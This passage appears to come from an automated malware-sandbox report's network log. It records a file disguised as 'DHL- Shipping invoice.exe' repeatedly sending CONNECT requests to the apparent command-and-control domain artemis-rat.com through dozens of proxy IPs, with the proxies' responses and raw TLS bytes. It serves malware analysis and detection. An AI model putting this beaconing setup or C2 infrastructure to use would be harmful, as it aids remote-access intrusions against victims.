                            Mar 12, 2024 08:37:48.963121891 CET590INHTTP/1.1 504 Connection failed
                            Connection: keep-alive
                            Cache-Control: no-cache
                            Pragma: no-cache
                            Content-Type: text/html
                            Content-Length: 443
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 20 3c 74 69 74 6c 65 3e 43 4f 57 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 20 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 68 31 3e 5b 45 72 72 6f 72 5d 20 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 31 34 2e 31 31 34 2e 31 31 34 2e 31 31 34 3a 35 33 3a 20 64 69 61 6c 20 75 64 70 20 31 31 34 2e 31 31 34 2e 31 31 34 2e 31 31 34 3a 35 33 3a 20 73 6f 63 6b 65 74 3a 20 74 6f 6f 20 6d 61 6e 79 20 6f 70 65 6e 20 66 69 6c 65 73 3c 2f 68 31 3e 0a 09 09 3c 70 3e 48 54 54 50 20 52 65 71 75 65 73 74 20 3c 73 74 72 6f 6e 67 3e 43 4f 4e 4e 45 43 54 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3a 34 34 33 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 20 3c 70 3e 44 69 72 65 63 74 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 2c 20 6e 6f 20 70 61 72 65 6e 74 20 70 72 6f 78 79 2e 3c 2f 70 3e 0a 09 09 3c 68 72 20 2f 3e 0a 09 09 47 65 6e 65 72 61 74 65 64 20 62 79 20 3c 69 3e 43 4f 57 20 30 2e 39 2e 38 3c 2f 69 3e 20 3c 62 72 20 2f 3e 0a 09 09 48 6f 73 74 20 3c 69 3e 65 63 6d 2d 34 32 39 35 3c 2f 69 3e 20 3c 62 72 20 2f 3e 0a 09 09 54 75 65 20 4d 61 72 20 31 32 20 31 35 3a 33 37 3a 34 38 20 32 30 32 34 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE html><html><head> <title>COW Proxy</title> </head><body><h1>[Error] dial tcp: lookup artemis-rat.com on 114.114.114.114:53: dial udp 114.114.114.114:53: socket: too many open files</h1><p>HTTP Request <strong>CONNECT artemis-rat.com:443</strong></p> <p>Direct connection failed, no parent proxy.</p><hr />Generated by <i>COW 0.9.8</i> <br />Host <i>ecm-4295</i> <br />Tue Mar 12 15:37:48 2024</body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            415192.168.2.450408113.208.119.14290026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.532849073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            416192.168.2.450343103.19.130.5080806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.533917904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.562496901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.563478947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.562753916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.562127113 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            417192.168.2.451412172.67.181.58806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.540666103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.628753901 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            418192.168.2.451386125.228.94.19941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.540709972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            419192.168.2.451421172.67.206.105806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.540714979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.628593922 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            420192.168.2.451431172.67.182.145806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.540762901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.628618002 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            421192.168.2.45152434.176.153.984436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.541558027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            422192.168.2.45152534.176.153.984436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.542943954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            423192.168.2.45142854.152.3.36806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.542946100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.640641928 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0
                            Mar 12, 2024 08:37:00.641227961 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 1b bb d8 92 8a d5 4d e8 4e 35 ea 36 12 f3 d2 f9 fc 9f 63 7c f8 1f bd 38 3d e0 9d ed 64 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: eMN56c|8=d*,+0/$#('=<5/Uartemis-rat.com#
                            Mar 12, 2024 08:37:00.737906933 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 b6 52 8b d4 73 2e 70 a1 68 10 c9 52 8f 6c 0b 7f 44 90 59 c6 43 57 c9 d8 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                            Data Ascii: =9Rs.phRlDYCWDOWNGRD0000*H010Uartemis-rat.com0240312073015Z260312073015Z010Uartemis-rat.com0"0*H05VUEP
                            Mar 12, 2024 08:37:00.747230053 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 de 57 65 07 4f 22 a0 0d fb ff b7 fa ea cf 1f 95 7d 74 70 f4 53 ea 28 30 23 cc 2a 7d ad 22 38 37 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 29 86 53 c7 86 7f 85 05 69 72 c4 bf 8f d9 5c c4 c3 2c bc cb fa
                            Data Ascii: %! WeO"}tpS(0#*}"87()Sir\,fU8_40y
                            Mar 12, 2024 08:37:00.844340086 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 49 d7 c5 aa 54 25 5d 52 fb 41 0c f2 a3 c6 0b fc ca b0 b9 ef 9e 2e 64 13 3b 24 58 4c 43 52 0d e8 56 21 b0 f0 57 5c 0d 59
                            Data Ascii: (IT%]RA.d;$XLCRV!W\Y


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            424192.168.2.451444172.67.254.127806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.544581890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.631910086 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            425192.168.2.45137020.205.61.14381236484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.545711994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.846585989 CET319INHTTP/1.1 403 Forbidden
                            Server: squid
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 17
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            X-Cache: MISS from cdn-fintech.info
                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                            Connection: keep-alive
                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                            Data Ascii: ERR_ACCESS_DENIED


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            426192.168.2.451454172.67.182.128806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.546467066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.633681059 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            427192.168.2.451471104.25.135.170806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.548939943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.636679888 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            428192.168.2.450562184.181.217.20141456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.549896002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            429192.168.2.451483104.16.25.216806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.551867962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.639734983 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            430192.168.2.451484104.27.83.183806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.552305937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.640341997 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:00 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            431192.168.2.451502172.65.165.93300006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.554976940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            432192.168.2.450269117.160.250.133806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.576931000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.562550068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.107248068 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            433192.168.2.4513854.144.161.159806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.580198050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            434192.168.2.45065437.187.73.7335516484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:00.622519016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.640645981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.750363111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.843924999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.953140020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:36.971712112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:49.140413046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
